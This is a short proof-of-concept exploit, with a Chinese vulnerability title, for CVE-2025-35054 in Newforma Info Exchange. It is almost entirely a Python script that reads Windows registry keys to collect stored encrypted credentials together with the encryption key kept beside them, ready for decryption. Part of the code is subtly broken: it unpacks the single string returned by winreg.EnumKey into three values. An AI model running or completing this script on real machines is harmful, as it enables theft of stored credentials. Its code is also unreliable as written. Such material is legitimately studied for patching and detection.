Newforma Info Exchange凭证加密密钥同存储导致凭据泄露漏洞

# PoC for CVE-2025-35054 # Exploit: Extract encrypted credentials and decryption key from Windows Registry # Target: Newforma Info Exchange (NIX) NPCS configuration # Registry Path: HKLM\Software\WOW6432Node\Newforma\<version>\Credentials import winreg import sys def extract_nix_credentials(version="Latest"): """ Extract encrypted credentials and encryption key from NIX registry. The encryption key is stored alongside the encrypted credentials, allowing trivial decryption by any authenticated user. """ registry_path = f"SOFTWARE\WOW6432Node\Newforma\{version}\Credentials" try: # Open the registry key (HKLM\Software\WOW6432Node\Newforma\<version>\Credentials) reg_key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, registry_path, 0, winreg.KEY_READ ) credentials = {} encryption_key = None # Enumerate all values under the Credentials key i = 0 while True: try: value_name, value_data, value_type = winreg.EnumValue(reg_key, i) # The encryption key is typically stored in the same location if "key" in value_name.lower() or "secret" in value_name.lower(): encryption_key = value_data print(f"[+] Found encryption key: {value_name}") else: credentials[value_name] = value_data print(f"[+] Found encrypted credential: {value_name}") i += 1 except OSError: break winreg.CloseKey(reg_key) if encryption_key and credentials: print(f"\n[!] VULNERABLE: Encryption key found alongside credentials!") print(f"[!] Key location: HKLM\\{registry_path}") print(f"[!] Number of credentials found: {len(credentials)}") print(f"\n[*] An attacker with local access can decrypt these credentials") print(f"[*] using the co-located encryption key to obtain plaintext.") # In a real exploit, the next step would be to use the encryption_key # to decrypt each credential value using the same algorithm NIX uses. return credentials, encryption_key else: print("[-] Encryption key or credentials not found at expected path.") return None, None except PermissionError: print("[-] Permission denied. Requires at least local user access.") return None, None except FileNotFoundError: print(f"[-] Registry path not found: {registry_path}") print("[-] NIX may not be installed or version path differs.") return None, None if __name__ == "__main__": print("=" * 70) print("CVE-2025-35054 - Newforma Info Exchange Credential Extraction PoC") print("=" * 70) # Try to enumerate installed Newforma versions try: parent_key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\WOW6432Node\Newforma", 0, winreg.KEY_READ ) i = 0 versions = [] while True: try: version, _, _ = winreg.EnumKey(parent_key, i) versions.append(version) i += 1 except OSError: break winreg.CloseKey(parent_key) if versions: print(f"\n[*] Found Newforma versions: {versions}") for ver in versions: extract_nix_credentials(ver) else: extract_nix_credentials() except FileNotFoundError: print("[-] Newforma software not found on this system.")